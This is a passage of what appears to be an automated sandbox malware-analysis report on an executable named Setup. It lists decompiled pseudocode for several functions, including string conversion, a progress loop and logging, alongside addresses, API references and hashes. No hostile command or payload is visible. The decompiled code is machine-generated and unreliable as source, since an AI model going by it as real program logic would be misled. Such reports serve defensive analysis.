				signed int _t135;
				void* _t136;
				void* _t137;
				intOrPtr _t138;
				intOrPtr _t140;

				_t134 = __esi;
				_t133 = __edi;
				_t101 = __ebx;
				_push(0xffffffff);
				_push(0x516c98);
				_push( *[fs:0x0]);
				_t137 = _t136 - 0x38;
				_t68 =  *0x561244; // 0xddd124f9
				_t69 = _t68 ^ _t135;
				_v40 = _t69;
				_push(_t69);
				 *[fs:0x0] =  &_v16;
				_v48 = __ecx;
				_v32 = E00417320();
				E00413100( &_v20);
				_v8 = 0;
				if(_a8 != 0xfde9) {
					_v36 = _a4;
					__eflags = _v36;
					if(__eflags != 0) {
						_t74 = E00451E10(_v36);
						_t138 = _t137 + 4;
						_v24 = _t74 + 1;
						_t41 =  &_v24; // 0x43573f
						__eflags =  *_t41 << 1 - 0x10000;
						if( *_t41 << 1 <= 0x10000) {
							_t45 =  &_v24; // 0x43573f
							__eflags =  *_t45 << 1;
							E00462F60( *_t45 << 1);
							_v72 = _t138;
							_v68 = _v72;
						} else {
							_t42 =  &_v24; // 0x43573f
							_v68 = E0041BA30( &_v20, __esi,  *_t42 << 1);
						}
						_t50 =  &_v24; // 0x43573f
						_v64 = E0042F040(_v68, _v68, _v36,  *_t50, _a8);
					} else {
						_v64 = 0;
					}
					E0041EDA0(_v48, __eflags, _v64);
					 *((intOrPtr*)(_v48 + 0x20)) = _a8;
				} else {
					_v36 = _a4;
					_t143 = _v36;
					if(_v36 != 0) {
						_t89 = E00451E10(_v36);
						_t140 = _t137 + 4;
						_t14 = _t89 + 2; // 0x2
						_v24 = _t89 + _t14;
						__eflags = _v24 - 0x10000;
						if(_v24 <= 0x10000) {
							E00462F60(_v24);
							_v60 = _t140;
							_v56 = _v60;
						} else {
							_v56 = E0041BA30( &_v20, __esi, _v24);
						}
						_v28 = _v56;
						__eflags = _v24 >> 1;
						_t94 = E0041BBD0(_t133, _v36, _v28, _v24 >> 1);
						_t137 = _t140 + 0xc;
						_v52 = _t94;
					} else {
						_v52 = 0;
					}
					E0041EDA0(_v48, _t143, _v52);
					 *((intOrPtr*)(_v48 + 0x20)) = E0041B5F0(_v48 + 4, E00416A30(_v48 + 4));
				}
				_v44 = _v48;
				_v8 = 0xffffffff;
				E004351A0( &_v20);
				 *[fs:0x0] = _v16;
				return E0044F6C8(_v44, _t101, _v40 ^ _t135, _v48, _t133, _t134);
			}
































                                                                                                                                                              0x0042f090
                                                                                                                                                              0x0042f090
                                                                                                                                                              0x0042f090
                                                                                                                                                              0x0042f093
                                                                                                                                                              0x0042f095
                                                                                                                                                              0x0042f0a0
                                                                                                                                                              0x0042f0a1
                                                                                                                                                              0x0042f0a4
                                                                                                                                                              0x0042f0a9
                                                                                                                                                              0x0042f0ab
                                                                                                                                                              0x0042f0ae
                                                                                                                                                              0x0042f0b2
                                                                                                                                                              0x0042f0b8
                                                                                                                                                              0x0042f0c0
                                                                                                                                                              0x0042f0c6
                                                                                                                                                              0x0042f0cb
                                                                                                                                                              0x0042f0d9
                                                                                                                                                              0x0042f17f
                                                                                                                                                              0x0042f182
                                                                                                                                                              0x0042f186
                                                                                                                                                              0x0042f195
                                                                                                                                                              0x0042f19a
                                                                                                                                                              0x0042f1a0
                                                                                                                                                              0x0042f1a3
                                                                                                                                                              0x0042f1a8
                                                                                                                                                              0x0042f1ae
                                                                                                                                                              0x0042f1c3
                                                                                                                                                              0x0042f1c6
                                                                                                                                                              0x0042f1c8
                                                                                                                                                              0x0042f1cd
                                                                                                                                                              0x0042f1d3
                                                                                                                                                              0x0042f1b0
                                                                                                                                                              0x0042f1b0
                                                                                                                                                              0x0042f1be
                                                                                                                                                              0x0042f1be
                                                                                                                                                              0x0042f1da
                                                                                                                                                              0x0042f1eb
                                                                                                                                                              0x0042f188
                                                                                                                                                              0x0042f188
                                                                                                                                                              0x0042f188
                                                                                                                                                              0x0042f1f5
                                                                                                                                                              0x0042f200
                                                                                                                                                              0x0042f0df
                                                                                                                                                              0x0042f0e2
                                                                                                                                                              0x0042f0e5
                                                                                                                                                              0x0042f0e9
                                                                                                                                                              0x0042f0f8
                                                                                                                                                              0x0042f0fd
                                                                                                                                                              0x0042f100
                                                                                                                                                              0x0042f104
                                                                                                                                                              0x0042f107
                                                                                                                                                              0x0042f10e
                                                                                                                                                              0x0042f124
                                                                                                                                                              0x0042f129
                                                                                                                                                              0x0042f12f
                                                                                                                                                              0x0042f110
                                                                                                                                                              0x0042f11c
                                                                                                                                                              0x0042f11c
                                                                                                                                                              0x0042f135
                                                                                                                                                              0x0042f13b
                                                                                                                                                              0x0042f146
                                                                                                                                                              0x0042f14b
                                                                                                                                                              0x0042f14e
                                                                                                                                                              0x0042f0eb
                                                                                                                                                              0x0042f0eb
                                                                                                                                                              0x0042f0eb
                                                                                                                                                              0x0042f158
                                                                                                                                                              0x0042f174
                                                                                                                                                              0x0042f174
                                                                                                                                                              0x0042f206
                                                                                                                                                              0x0042f209
                                                                                                                                                              0x0042f213
                                                                                                                                                              0x0042f221
                                                                                                                                                              0x0042f236

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strlen$_malloc
                                                                                                                                                              • String ID: ?WC$?WC
                                                                                                                                                              • API String ID: 1848352940-3621212526
                                                                                                                                                              • Opcode ID: cb553d21126b40978c9c1d9364a7c44a1aca97ea65b2ab024412406693a42ca8
                                                                                                                                                              • Instruction ID: fe12d40af176b4895fcee0970b276af7f596cbb0b5865be36414c146b9af3522
                                                                                                                                                              • Opcode Fuzzy Hash: cb553d21126b40978c9c1d9364a7c44a1aca97ea65b2ab024412406693a42ca8
                                                                                                                                                              • Instruction Fuzzy Hash: 4F51F6B1E00119DBCB04DFA9D981AEEB7B1FF48304F90812EE815B7341D738AA45CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004E6B00 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124sleepCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E004E6B00(intOrPtr __ecx, void* __esi, int _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				signed int _t66;
				void* _t136;
				signed int _t137;

				_t136 = __esi;
				_push(0xffffffff);
				_push(0x5062ed);
				_push( *[fs:0x0]);
				_t66 =  *0x561244; // 0xddd124f9
				_push(_t66 ^ _t137);
				 *[fs:0x0] =  &_v16;
				_v76 = __ecx;
				_v20 = 0x8000ffff;
				if(E0041D530(_v76 + 0x3c) != 0) {
					E00439EE0();
					_v8 = 0;
					_v80 = E0041D530(_v76 + 0x3c);
					 *((intOrPtr*)( *((intOrPtr*)( *_v80 + 0x1c))))(_v80, E00434050( &_v24));
					if(E0041D530( &_v24) != 0) {
						if(_a4 == 0xffffffff) {
							_a4 = 0x64;
						}
						E00416A10( &_v56);
						_v8 = 1;
						E00416A10( &_v72);
						_v8 = 2;
						E00416A10( &_v40);
						_v8 = 3;
						do {
							if(_a4 -  *(_v76 + 0xc) <= 3) {
								_v84 = _a4 -  *(_v76 + 0xc);
							} else {
								_v84 = 3;
							}
							 *(_v76 + 0xc) =  *(_v76 + 0xc) + _v84;
							E00423440( &_v56,  *(_v76 + 0xc));
							E00423440( &_v72, MulDiv( *(_v76 + 0xc),  *(_v76 + 4), 0x64) +  *((intOrPtr*)(_v76 + 8)));
							_v20 = E004233F0( &_v24, _t136, L"onNotifyProgress",  &_v56,  &_v72,  &_v40);
							if( *(_v76 + 0xc) < _a4) {
								Sleep(0xa);
							}
						} while ( *(_v76 + 0xc) < _a4);
						_v8 = 2;
						E00417430( &_v40);
						_v8 = 1;
						E00417430( &_v72);
						_v8 = 0;
						E00417430( &_v56);
					}
					_v8 = 0xffffffff;
					E00439240();
				}
				 *[fs:0x0] = _v16;
				return 0;
			}
















                                                                                                                                                              0x004e6b00
                                                                                                                                                              0x004e6b03
                                                                                                                                                              0x004e6b05
                                                                                                                                                              0x004e6b10
                                                                                                                                                              0x004e6b14
                                                                                                                                                              0x004e6b1b
                                                                                                                                                              0x004e6b1f
                                                                                                                                                              0x004e6b25
                                                                                                                                                              0x004e6b28
                                                                                                                                                              0x004e6b3c
                                                                                                                                                              0x004e6b45
                                                                                                                                                              0x004e6b4a
                                                                                                                                                              0x004e6b5c
                                                                                                                                                              0x004e6b74
                                                                                                                                                              0x004e6b80
                                                                                                                                                              0x004e6b8a
                                                                                                                                                              0x004e6b8c
                                                                                                                                                              0x004e6b8c
                                                                                                                                                              0x004e6b96
                                                                                                                                                              0x004e6b9b
                                                                                                                                                              0x004e6ba2
                                                                                                                                                              0x004e6ba7
                                                                                                                                                              0x004e6bae
                                                                                                                                                              0x004e6bb3
                                                                                                                                                              0x004e6bb7
                                                                                                                                                              0x004e6bc3
                                                                                                                                                              0x004e6bd7
                                                                                                                                                              0x004e6bc5
                                                                                                                                                              0x004e6bc5
                                                                                                                                                              0x004e6bc5
                                                                                                                                                              0x004e6be6
                                                                                                                                                              0x004e6bf3
                                                                                                                                                              0x004e6c18
                                                                                                                                                              0x004e6c36
                                                                                                                                                              0x004e6c42
                                                                                                                                                              0x004e6c46
                                                                                                                                                              0x004e6c46
                                                                                                                                                              0x004e6c52
                                                                                                                                                              0x004e6c5b
                                                                                                                                                              0x004e6c62
                                                                                                                                                              0x004e6c67
                                                                                                                                                              0x004e6c6e
                                                                                                                                                              0x004e6c73
                                                                                                                                                              0x004e6c7a
                                                                                                                                                              0x004e6c7a
                                                                                                                                                              0x004e6c7f
                                                                                                                                                              0x004e6c89
                                                                                                                                                              0x004e6c89
                                                                                                                                                              0x004e6c93
                                                                                                                                                              0x004e6c9e

                                                                                                                                                              APIs
                                                                                                                                                              • MulDiv.KERNEL32(?,?,00000064), ref: 004E6C08
                                                                                                                                                              • Sleep.KERNEL32(0000000A,onNotifyProgress,?,?,?,?), ref: 004E6C46
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Sleep
                                                                                                                                                              • String ID: d$onNotifyProgress
                                                                                                                                                              • API String ID: 3472027048-1609401321
                                                                                                                                                              • Opcode ID: 9d87373aa5f0380d0523721526ff7348d815d258d46ac3fcf6cd2fb38ae34b26
                                                                                                                                                              • Instruction ID: a37b9d4cbb157d9b5eae3b3dd72c928394f0c5ab0b1a33107af4011a95fb9640
                                                                                                                                                              • Opcode Fuzzy Hash: 9d87373aa5f0380d0523721526ff7348d815d258d46ac3fcf6cd2fb38ae34b26
                                                                                                                                                              • Instruction Fuzzy Hash: 88515C70900248DFCB04DF99C991AEEFBB5FF14318F24825EE405A7291DB74AE46CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00427B10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00427B10(char __ecx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _t27;
				char* _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				intOrPtr* _t39;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t47;
				intOrPtr* _t51;
				void* _t78;
				void* _t83;
				void* _t85;
				void* _t87;

				_v12 = __ecx;
				_t2 =  &_a4; // 0x433644
				_v8 =  *((intOrPtr*)(E00441910( *_t2)));
				_t27 = E00415110(_v8);
				_t5 =  &_a4; // 0x433644
				 *((intOrPtr*)(E00441910( *_t5))) =  *_t27;
				_t32 = E004271F0( *((intOrPtr*)(E00415110(_v8))));
				_t83 = _t78 + 0x14;
				if( *_t32 == 0) {
					_t51 = E0042AE30( *((intOrPtr*)(E00415110(_v8))));
					_t83 = _t83 + 8;
					_t8 =  &_a4; // 0x433644
					 *_t51 =  *_t8;
				}
				_t9 =  &_a4; // 0x433644
				_t33 = E0042AE30( *_t9);
				_t35 = E0042AE30(_v8);
				_t85 = _t83 + 8;
				 *_t35 =  *_t33;
				_t11 =  &_v12; // 0x433644
				_t36 = E0041D410( *_t11);
				_t12 =  &_a4; // 0x433644
				if( *_t12 !=  *_t36) {
					_t15 =  &_a4; // 0x433644
					_t39 = E00415110( *((intOrPtr*)(E0042AE30( *_t15))));
					_t87 = _t85 + 8;
					_t16 =  &_a4; // 0x433644
					if( *_t16 !=  *_t39) {
						_t19 =  &_a4; // 0x433644
						_t42 = E00441910( *((intOrPtr*)(E0042AE30( *_t19))));
						_t85 = _t87 + 8;
						 *_t42 = _v8;
					} else {
						_t17 =  &_a4; // 0x433644
						_t47 = E00415110( *((intOrPtr*)(E0042AE30( *_t17))));
						_t85 = _t87 + 8;
						 *_t47 = _v8;
					}
				} else {
					_t13 =  &_v12; // 0x433644
					 *((intOrPtr*)(E0041D410( *_t13))) = _v8;
				}
				_t43 = E00415110(_v8);
				_t22 =  &_a4; // 0x433644
				 *_t43 =  *_t22;
				_t23 =  &_a4; // 0x433644
				_t44 = E0042AE30( *_t23);
				 *_t44 = _v8;
				return _t44;
			}




















                                                                                                                                                              0x00427b17
                                                                                                                                                              0x00427b1a
                                                                                                                                                              0x00427b28
                                                                                                                                                              0x00427b2f
                                                                                                                                                              0x00427b39
                                                                                                                                                              0x00427b47
                                                                                                                                                              0x00427b58
                                                                                                                                                              0x00427b5d
                                                                                                                                                              0x00427b65
                                                                                                                                                              0x00427b76
                                                                                                                                                              0x00427b7b
                                                                                                                                                              0x00427b7e
                                                                                                                                                              0x00427b81
                                                                                                                                                              0x00427b81
                                                                                                                                                              0x00427b83
                                                                                                                                                              0x00427b87
                                                                                                                                                              0x00427b95
                                                                                                                                                              0x00427b9a
                                                                                                                                                              0x00427b9f
                                                                                                                                                              0x00427ba1
                                                                                                                                                              0x00427ba4
                                                                                                                                                              0x00427ba9
                                                                                                                                                              0x00427bae
                                                                                                                                                              0x00427bbf
                                                                                                                                                              0x00427bce
                                                                                                                                                              0x00427bd3
                                                                                                                                                              0x00427bd6
                                                                                                                                                              0x00427bdb
                                                                                                                                                              0x00427bfb
                                                                                                                                                              0x00427c0a
                                                                                                                                                              0x00427c0f
                                                                                                                                                              0x00427c15
                                                                                                                                                              0x00427bdd
                                                                                                                                                              0x00427bdd
                                                                                                                                                              0x00427bec
                                                                                                                                                              0x00427bf1
                                                                                                                                                              0x00427bf7
                                                                                                                                                              0x00427bf7
                                                                                                                                                              0x00427bb0
                                                                                                                                                              0x00427bb0
                                                                                                                                                              0x00427bbb
                                                                                                                                                              0x00427bbb
                                                                                                                                                              0x00427c1b
                                                                                                                                                              0x00427c23
                                                                                                                                                              0x00427c26
                                                                                                                                                              0x00427c28
                                                                                                                                                              0x00427c2c
                                                                                                                                                              0x00427c37
                                                                                                                                                              0x00427c3d

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID: D6C$D6C
                                                                                                                                                              • API String ID: 2519475695-3729970199
                                                                                                                                                              • Opcode ID: 73bab9b323b3af65f751d4bceb1319c06beba5c8193e2e25ad457ea62c87e230
                                                                                                                                                              • Instruction ID: 1e1819cb50db400c064340da7a5e868b9e1a5bb3b7431f14cbdcda3e580f80ba
                                                                                                                                                              • Opcode Fuzzy Hash: 73bab9b323b3af65f751d4bceb1319c06beba5c8193e2e25ad457ea62c87e230
                                                                                                                                                              • Instruction Fuzzy Hash: C44162F9E00114AFDB05EF64E48289E7775AF98308B1444B9F8094B312E639EE51CB96
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004C1FE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E004C1FE0(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v37;
				intOrPtr _v44;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t39;
				void* _t43;
				intOrPtr _t51;
				void* _t55;
				intOrPtr _t75;
				void* _t78;
				signed int _t82;
				void* _t83;
				intOrPtr _t84;
				void* _t85;
				void* _t86;

				_push(0xffffffff);
				_push(0x506acb);
				_push( *[fs:0x0]);
				_t84 = _t83 - 0x18;
				_push(_t55);
				_push(_t78);
				_t39 =  *0x561244; // 0xddd124f9
				_push(_t39 ^ _t82);
				 *[fs:0x0] =  &_v16;
				_v20 = _t84;
				_t43 = E0044F9A4(_a8);
				_t85 = _t84 + 4;
				if(_t43 != 0) {
					_v8 = 0;
					_v28 =  &_a12;
					E00453611(0x5c21f0, 0x3e8, _a8, _v28);
					_t86 = _t85 + 0x10;
					_v28 = 0;
					_v8 = 0xffffffff;
					_t75 = _a4;
					_t90 =  *((intOrPtr*)(_t75 + 4));
					if( *((intOrPtr*)(_t75 + 4)) == 0) {
						_t51 = E0044F76F(_t55, _t78, _t90, 0x20);
						_t86 = _t86 + 4;
						_v36 = _t51;
						_v8 = 2;
						if(_v36 == 0) {
							_v44 = 0;
						} else {
							_v44 = E004175C0(E00434050( &_v37));
						}
						_v32 = _v44;
						_v8 = 0xffffffff;
						 *((intOrPtr*)(_a4 + 4)) = _v32;
					}
					_v24 =  *((intOrPtr*)(_a4 + 4));
					E004130D0(_v24 + 4, 0x5c21f0);
					E004130D0(_v24 + 4, 0x5300d0);
					if( *((intOrPtr*)(_a4 + 8)) != 0xffffffff) {
						E004C1E80(0x5c21f0, 0x3e8, L"->[%d]\n",  *((intOrPtr*)(_a4 + 8)));
						__eflags = _v24 + 4;
						_t43 = E004130D0(_v24 + 4, 0x5c21f0);
					} else {
						_t43 = E004130D0(_v24 + 4, 0x5300d4);
					}
				}
				 *[fs:0x0] = _v16;
				return _t43;
			}



























                                                                                                                                                              0x004c1fe3
                                                                                                                                                              0x004c1fe5
                                                                                                                                                              0x004c1ff0
                                                                                                                                                              0x004c1ff2
                                                                                                                                                              0x004c1ff5
                                                                                                                                                              0x004c1ff7
                                                                                                                                                              0x004c1ff8
                                                                                                                                                              0x004c1fff
                                                                                                                                                              0x004c2003
                                                                                                                                                              0x004c2009
                                                                                                                                                              0x004c2010
                                                                                                                                                              0x004c2015
                                                                                                                                                              0x004c201a
                                                                                                                                                              0x004c2020
                                                                                                                                                              0x004c202a
                                                                                                                                                              0x004c203f
                                                                                                                                                              0x004c2044
                                                                                                                                                              0x004c2047
                                                                                                                                                              0x004c2078
                                                                                                                                                              0x004c207f
                                                                                                                                                              0x004c2082
                                                                                                                                                              0x004c2086
                                                                                                                                                              0x004c208a
                                                                                                                                                              0x004c208f
                                                                                                                                                              0x004c2092
                                                                                                                                                              0x004c2095
                                                                                                                                                              0x004c20a0
                                                                                                                                                              0x004c20b8
                                                                                                                                                              0x004c20a2
                                                                                                                                                              0x004c20b3
                                                                                                                                                              0x004c20b3
                                                                                                                                                              0x004c20c2
                                                                                                                                                              0x004c20c5
                                                                                                                                                              0x004c20d2
                                                                                                                                                              0x004c20d2
                                                                                                                                                              0x004c20db
                                                                                                                                                              0x004c20e9
                                                                                                                                                              0x004c20f9
                                                                                                                                                              0x004c2105
                                                                                                                                                              0x004c212f
                                                                                                                                                              0x004c213f
                                                                                                                                                              0x004c2142
                                                                                                                                                              0x004c2107
                                                                                                                                                              0x004c2112
                                                                                                                                                              0x004c2112
                                                                                                                                                              0x004c2105
                                                                                                                                                              0x004c214a
                                                                                                                                                              0x004c2158

                                                                                                                                                              APIs
                                                                                                                                                              • _wcslen.LIBCMT ref: 004C2010
                                                                                                                                                              • _vswprintf_s.LIBCMT ref: 004C203F
                                                                                                                                                                • Part of subcall function 00453611: __vsnwprintf_l.LIBCMT ref: 00453624
                                                                                                                                                                • Part of subcall function 0044F76F: _malloc.LIBCMT ref: 0044F789
                                                                                                                                                              • _swprintf.LIBCMTD ref: 004C212F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __vsnwprintf_l_malloc_swprintf_vswprintf_s_wcslen
                                                                                                                                                              • String ID: ->[%d]
                                                                                                                                                              • API String ID: 919113508-1967647186
                                                                                                                                                              • Opcode ID: 3cf0d23f4590347f0f25dd8f71b9a34a9668a45c691074d73b9181e1dd036ae7
                                                                                                                                                              • Instruction ID: e3a414589ff9bb562630220d31cb12d6e02212e954a4a91c085afea6a517ee55
                                                                                                                                                              • Opcode Fuzzy Hash: 3cf0d23f4590347f0f25dd8f71b9a34a9668a45c691074d73b9181e1dd036ae7
                                                                                                                                                              • Instruction Fuzzy Hash: D9417374A00209AFDB14DF89C955FEEBBB4FB04314F14421EE915673C1D7B4AA41CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004F2770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E004F2770(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v16;
				char _v20;
				intOrPtr _v32;
				char _v40;
				char _v41;
				intOrPtr* _v48;
				signed int _t26;
				char _t32;
				signed char _t35;
				signed int _t69;

				_push(0xffffffff);
				_push(0x50f626);
				_push( *[fs:0x0]);
				_t26 =  *0x561244; // 0xddd124f9
				_push(_t26 ^ _t69);
				 *[fs:0x0] =  &_v16;
				_v48 = __ecx;
				if((E00404920(E00404820()) & 0x000000ff) != 0 || ( *0x5bdd29 & 0x000000ff) != 0) {
					L7:
					_t32 = 1;
				} else {
					E00414C90();
					_v8 = 0;
					_t35 = E004F06E0(_v48, L"brwseCntnr", E00434050( &_v20));
					_t75 = _t35 & 0x000000ff;
					if((_t35 & 0x000000ff) == 0) {
						L6:
						_v8 = 0xffffffff;
						E0040D320();
						goto L7;
					} else {
						E00416A10( &_v40);
						_v8 = 1;
						 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x80))))(_v48, L"getBrowse", 0, 0,  &_v40);
						if((E004D9EF0(__ebx, E00404820(), _v32, __edi, __esi, _t75, __fp0, _v32) & 0x000000ff) != 0) {
							_v8 = 0;
							E00417430( &_v40);
							goto L6;
						} else {
							_v41 = 0;
							_v8 = 0;
							E00417430( &_v40);
							_v8 = 0xffffffff;
							E0040D320();
							_t32 = _v41;
						}
					}
				}
				 *[fs:0x0] = _v16;
				return _t32;
			}














                                                                                                                                                              0x004f2773
                                                                                                                                                              0x004f2775
                                                                                                                                                              0x004f2780
                                                                                                                                                              0x004f2784
                                                                                                                                                              0x004f278b
                                                                                                                                                              0x004f278f
                                                                                                                                                              0x004f2795
                                                                                                                                                              0x004f27a9
                                                                                                                                                              0x004f286a
                                                                                                                                                              0x004f286a
                                                                                                                                                              0x004f27be
                                                                                                                                                              0x004f27c1
                                                                                                                                                              0x004f27c6
                                                                                                                                                              0x004f27de
                                                                                                                                                              0x004f27e6
                                                                                                                                                              0x004f27e8
                                                                                                                                                              0x004f285b
                                                                                                                                                              0x004f285b
                                                                                                                                                              0x004f2865
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f27ea
                                                                                                                                                              0x004f27ed
                                                                                                                                                              0x004f27f2
                                                                                                                                                              0x004f2812
                                                                                                                                                              0x004f2829
                                                                                                                                                              0x004f284f
                                                                                                                                                              0x004f2856
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004f282b
                                                                                                                                                              0x004f282b
                                                                                                                                                              0x004f282f
                                                                                                                                                              0x004f2836
                                                                                                                                                              0x004f283b
                                                                                                                                                              0x004f2845
                                                                                                                                                              0x004f284a
                                                                                                                                                              0x004f284a
                                                                                                                                                              0x004f2829
                                                                                                                                                              0x004f27e8
                                                                                                                                                              0x004f286f
                                                                                                                                                              0x004f287a

                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F2798
                                                                                                                                                                • Part of subcall function 00416A10: VariantInit.OLEAUT32(4<O), ref: 00416A1B
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004F2818
                                                                                                                                                                • Part of subcall function 004D9EF0: _Immortalize.LIBCPMTD ref: 004D9F39
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
